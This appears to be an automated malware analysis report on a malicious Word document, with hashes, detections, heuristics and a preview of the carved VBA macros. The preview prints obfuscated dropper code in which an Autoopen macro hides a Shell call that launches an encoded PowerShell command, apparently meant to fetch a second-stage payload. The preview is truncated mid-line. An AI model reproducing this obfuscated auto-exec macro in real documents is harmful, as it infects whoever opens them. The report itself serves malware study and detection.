Office (OLE) malware analysis — malicious · b2924012867d83b6

MALICIOUS

Office (OLE)

111.8 KB Created: 2018-05-30 06:25:00 Authoring application: Microsoft Office Word First seen: 2018-06-19

MD5: 6aea599806a1a31af81be4f2e4120020 SHA-1: 82ad2f8d0ba7e8b617e78506b3ad8008424e6722 SHA-256: b2924012867d83b6b3f04d556a3311255a78ff883e9bc9d8b328bd840fa22b6e

242 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious Office document containing VBA macros. The Autoopen macro triggers a Shell() call which executes a PowerShell command. This command is obfuscated but appears to be designed to download and execute a second-stage payload, as indicated by the critical heuristic firings and the nature of the script.

Heuristics 7

ClamAV: Doc.Dropper.Agent-6565119-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6565119-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 15249 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	15249 bytes
SHA-256: `3804d9e15d35526646ff91a0921bd83680404c694fb5f6fa0d9ab60ec3ce19ac`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "bpQVuMdM" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Function jkRFwDRCE() On Error Resume Next sTiBfz = Fix(94964 / CSng(4060) * GWoqOC * vTSSrF) VhBn = CDate(48905) lvlHc = Fix(9177 / CSng(69661) * zaVAWs * Duiok) VhBn = CDate(90467) jkRFwDRCE = ASXcIW + XQQiiJWBizI + lUuws + CEwBjUiXk + EVkCGvaYb + nLaVXLNkj + wqjzIazSPPU + qhwTvwoYT + OiSwlsVTp + ijlznuK adCho = Fix(77451 / CSng(45319) * wnuiP * OqZrVv) VhBn = CDate(77263) End Function Sub Autoopen() On Error Resume Next tCbDw = Fix(28181 / CSng(45861) * RoJRV * EuPvC) VhBn = CDate(98244) qotwUp (jkRFwDRCE) iGsckp = Fix(8376 / CSng(15727) * OzjJkz * lpIdp) VhBn = CDate(42353) End Sub Function qotwUp(rwSfOwlfwP) On Error Resume Next VzOGl = Fix(60624 / CSng(53559) * spoLw * aOYTAU) VhBn = CDate(50662) tuILZF = icsHTWaDUE + Shell(GRDTbiQ + (Chr(vbKeyP)) + ikISjW + rwSfOwlfwP + pVmqYC, OubqE + vbHide + JniCr) lLWEn = Fix(57971 / CSng(12732) * WmMAXi * jScUo) VhBn = CDate(13095) End Function Attribute VB_Name = "UZDXLbkJoBiLM" Function ASXcIW() On Error Resume Next rSUhv = Fix(46094 / CSng(78334) * ZqqhBT * jJhdJD) VhBn = CDate(16973) DIsovRZI = "owersH" + "eLL -WinDows" + "Tyle hidde" + "n -e IAAuA" + "CgAIAAkAFMASABF" + "AGwAbABpAEQA" lzjiuX = Fix(97832 / CSng(71393) * ztPPE * LWOVi) VhBn = CDate(56439) rsHlF = "WwAxAF0AKwAkAF" + "MAaABlAEw" + "ATABpAGQAWwA" + "xADMAXQ" + "ArACcAWAAn" + "ACkAIAA" + "oACgAKA" + "AiAHs" + "ANQA4" IEXMr = Fix(10126 / CSng(70435) * FKjUih * tuGaF) VhBn = CDate(45424) bZEAMcSbH = "AH0AewAxAD" + "cAfQB7ADcANQB9" + "AHsAMQA2AH0Ae" + "wAyADYAfQB7ADMA" + "MQB9AHsAM" + "QAzADcAfQB7" + "ADUAMgB9" HDifpV = Fix(14930 / CSng(90539) * iUOrfH * ftAfuj) VhBn = CDate(61920) zdhIi = "AHsANQ" + "B9AHsA" + "NwA5AH0AewA5A" + "DIAfQB" + "7ADgAM" + "wB9AHsA" + "NwA4AH0AewAxADI" + "ANwB9AHsAOQA0A" + "H0AewA" + "yADcAfQB7AD" VmAcTP = Fix(8789 / CSng(45415) * awTiM * PfKcF) VhBn = CDate(99163) zosjwJIa = "EAMgA4AH0A" + "ewAxADEANwB9AHs" + "AMQAxADkAfQB7AD" + "QAMgB9AH" + "sAMwA5" + "AH0AewA1A" + "DQAfQB7ADEAMA" + "AyAH0AewAxAD" qflNa = Fix(62752 / CSng(10073) * nYXjJD * ibSZz) VhBn = CDate(26911) zoiwC = "EAfQB7ADE" + "AMwA5AH0AewA4" + "ADgAfQB" + "7ADIAMAB9A" + "HsAMgAzAH0AewAz" + "ADMAfQB7AD" jnzTd = Fix(72012 / CSng(663) * GbvAvU * GoXSIm) VhBn = CDate(46264) LdpSJXLDO = "cAfQB7ADMANQB9" + "AHsAOQA5" + "AH0Aew" + "AxADIAM" + "wB9AHsANwAzAH" + "0AewAxADAA" + "MAB9AHsAMQA" + "zADYA" + "fQB7ADg" + "ANQB9AHsANgAyA" wDMtAj = Fix(19662 / CSng(60860) * GawwO * DTrER) VhBn = CDate(93323) YiZkn = "H0AewA4AH0" + "AewAyADUA" + "fQB7ADUAMwB9" + "AHsAMQAyADEAf" + "QB7ADkAfQB7" IHBoVd = Fix(2913 / CSng(59001) * dLrBQ * rzAwv) VhBn = CDate(86106) DTsLQ = "ADgAMQB9AHsA" + "MQAxADEAf" + "QB7ADEAMwA4AH0" + "AewA0" + "ADUAfQB7ADYAOAB" + "9AHsANgAwAH0" + "AewAyADg" + "AfQB7A" ASXcIW = DIsovRZI + rsHlF + bZEAMcSbH + zdhIi + zosjwJIa + zoiwC + LdpSJXLDO + YiZkn + DTsLQ End Function Function XQQiiJWBizI() On Error Resume Next VXsrhU = Fix(97287 / CSng(32086) * GzJuFs * NjiXB) VhBn = CDate(92418) FuOSjiTPwL = "DcANgB9AHsAN" + "gA0AH0Aew" + "A3ADQAfQB" + "7ADgA" + "MAB9AHsA" + "MQAwA" + "DEAfQB7ADYANQB" + "9AHsA" HNqmbr = Fix(6947 / CSng(40662) * vOmdv * wjjpvE) VhBn = CDate(84318) drkiB = "OQAzAH0AewAw" + "AH0Aew" + "A2ADYAfQ" + "B7ADEAMA" + "A4AH0AewA1ADc" + "AfQB7" VLznmP = Fix(33315 / CSng(40288) * Zmliqi * ZflwN) VhBn = CDate(60206) nkjpkWvZcRw = "ADkAOAB9AHsA" + "MwA2A" + "H0AewA2AH0Ae" + "wAyADEAfQB7ADUA" + "NQB9AHsAM" OQkkz = Fix(84111 / CSng(23033) * jPVUb * EQFjaW) VhBn = CDate(25652) ZdsjSDBSSJi = "QA4AH0AewA1A" + "DAAfQ" + "B7ADQAfQB7ADEA" + "MQA2AH0AewAxA" + "DEAMwB9AHsANg" KzFwJQ = Fix(31196 / CSng(37648) * iqslXC * TdjYFW) VhBn = CDate(17318) OiTWMtRJid = "A5AH0AewA4ADYAf" + "QB7ADk" + "ANQB9AHsANwA3" + "AH0AewA5" + "ADcAfQB7A" + "DEAMwAzAH0" HuVOj = Fix(28350 / CSng(74 ... (truncated)

SHA-256: 3804d9e15d35526646ff91a0921bd83680404c694fb5f6fa0d9ab60ec3ce19ac

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "bpQVuMdM"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function jkRFwDRCE()
On Error Resume Next
sTiBfz = Fix(94964 / CSng(4060) * GWoqOC * vTSSrF)
VhBn = CDate(48905)
lvlHc = Fix(9177 / CSng(69661) * zaVAWs * Duiok)
VhBn = CDate(90467)
jkRFwDRCE = ASXcIW + XQQiiJWBizI + lUuws + CEwBjUiXk + EVkCGvaYb + nLaVXLNkj + wqjzIazSPPU + qhwTvwoYT + OiSwlsVTp + ijlznuK
adCho = Fix(77451 / CSng(45319) * wnuiP * OqZrVv)
VhBn = CDate(77263)
End Function
Sub Autoopen()
On Error Resume Next
tCbDw = Fix(28181 / CSng(45861) * RoJRV * EuPvC)
VhBn = CDate(98244)
qotwUp (jkRFwDRCE)
iGsckp = Fix(8376 / CSng(15727) * OzjJkz * lpIdp)
VhBn = CDate(42353)
End Sub
Function qotwUp(rwSfOwlfwP)
On Error Resume Next
VzOGl = Fix(60624 / CSng(53559) * spoLw * aOYTAU)
VhBn = CDate(50662)
tuILZF = icsHTWaDUE + Shell(GRDTbiQ + (Chr(vbKeyP)) + ikISjW + rwSfOwlfwP + pVmqYC, OubqE + vbHide + JniCr)
lLWEn = Fix(57971 / CSng(12732) * WmMAXi * jScUo)
VhBn = CDate(13095)
End Function


Attribute VB_Name = "UZDXLbkJoBiLM"
Function ASXcIW()
On Error Resume Next
rSUhv = Fix(46094 / CSng(78334) * ZqqhBT * jJhdJD)
VhBn = CDate(16973)
DIsovRZI = "owersH" + "eLL -WinDows" + "Tyle hidde" + "n -e IAAuA" + "CgAIAAkAFMASABF" + "AGwAbABpAEQA"
lzjiuX = Fix(97832 / CSng(71393) * ztPPE * LWOVi)
VhBn = CDate(56439)
rsHlF = "WwAxAF0AKwAkAF" + "MAaABlAEw" + "ATABpAGQAWwA" + "xADMAXQ" + "ArACcAWAAn" + "ACkAIAA" + "oACgAKA" + "AiAHs" + "ANQA4"
IEXMr = Fix(10126 / CSng(70435) * FKjUih * tuGaF)
VhBn = CDate(45424)
bZEAMcSbH = "AH0AewAxAD" + "cAfQB7ADcANQB9" + "AHsAMQA2AH0Ae" + "wAyADYAfQB7ADMA" + "MQB9AHsAM" + "QAzADcAfQB7" + "ADUAMgB9"
HDifpV = Fix(14930 / CSng(90539) * iUOrfH * ftAfuj)
VhBn = CDate(61920)
zdhIi = "AHsANQ" + "B9AHsA" + "NwA5AH0AewA5A" + "DIAfQB" + "7ADgAM" + "wB9AHsA" + "NwA4AH0AewAxADI" + "ANwB9AHsAOQA0A" + "H0AewA" + "yADcAfQB7AD"
VmAcTP = Fix(8789 / CSng(45415) * awTiM * PfKcF)
VhBn = CDate(99163)
zosjwJIa = "EAMgA4AH0A" + "ewAxADEANwB9AHs" + "AMQAxADkAfQB7AD" + "QAMgB9AH" + "sAMwA5" + "AH0AewA1A" + "DQAfQB7ADEAMA" + "AyAH0AewAxAD"
qflNa = Fix(62752 / CSng(10073) * nYXjJD * ibSZz)
VhBn = CDate(26911)
zoiwC = "EAfQB7ADE" + "AMwA5AH0AewA4" + "ADgAfQB" + "7ADIAMAB9A" + "HsAMgAzAH0AewAz" + "ADMAfQB7AD"
jnzTd = Fix(72012 / CSng(663) * GbvAvU * GoXSIm)
VhBn = CDate(46264)
LdpSJXLDO = "cAfQB7ADMANQB9" + "AHsAOQA5" + "AH0Aew" + "AxADIAM" + "wB9AHsANwAzAH" + "0AewAxADAA" + "MAB9AHsAMQA" + "zADYA" + "fQB7ADg" + "ANQB9AHsANgAyA"
wDMtAj = Fix(19662 / CSng(60860) * GawwO * DTrER)
VhBn = CDate(93323)
YiZkn = "H0AewA4AH0" + "AewAyADUA" + "fQB7ADUAMwB9" + "AHsAMQAyADEAf" + "QB7ADkAfQB7"
IHBoVd = Fix(2913 / CSng(59001) * dLrBQ * rzAwv)
VhBn = CDate(86106)
DTsLQ = "ADgAMQB9AHsA" + "MQAxADEAf" + "QB7ADEAMwA4AH0" + "AewA0" + "ADUAfQB7ADYAOAB" + "9AHsANgAwAH0" + "AewAyADg" + "AfQB7A"
ASXcIW = DIsovRZI + rsHlF + bZEAMcSbH + zdhIi + zosjwJIa + zoiwC + LdpSJXLDO + YiZkn + DTsLQ
End Function
Function XQQiiJWBizI()
On Error Resume Next
VXsrhU = Fix(97287 / CSng(32086) * GzJuFs * NjiXB)
VhBn = CDate(92418)
FuOSjiTPwL = "DcANgB9AHsAN" + "gA0AH0Aew" + "A3ADQAfQB" + "7ADgA" + "MAB9AHsA" + "MQAwA" + "DEAfQB7ADYANQB" + "9AHsA"
HNqmbr = Fix(6947 / CSng(40662) * vOmdv * wjjpvE)
VhBn = CDate(84318)
drkiB = "OQAzAH0AewAw" + "AH0Aew" + "A2ADYAfQ" + "B7ADEAMA" + "A4AH0AewA1ADc" + "AfQB7"
VLznmP = Fix(33315 / CSng(40288) * Zmliqi * ZflwN)
VhBn = CDate(60206)
nkjpkWvZcRw = "ADkAOAB9AHsA" + "MwA2A" + "H0AewA2AH0Ae" + "wAyADEAfQB7ADUA" + "NQB9AHsAM"
OQkkz = Fix(84111 / CSng(23033) * jPVUb * EQFjaW)
VhBn = CDate(25652)
ZdsjSDBSSJi = "QA4AH0AewA1A" + "DAAfQ" + "B7ADQAfQB7ADEA" + "MQA2AH0AewAxA" + "DEAMwB9AHsANg"
KzFwJQ = Fix(31196 / CSng(37648) * iqslXC * TdjYFW)
VhBn = CDate(17318)
OiTWMtRJid = "A5AH0AewA4ADYAf" + "QB7ADk" + "ANQB9AHsANwA3" + "AH0AewA5" + "ADcAfQB7A" + "DEAMwAzAH0"
HuVOj = Fix(28350 / CSng(74
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.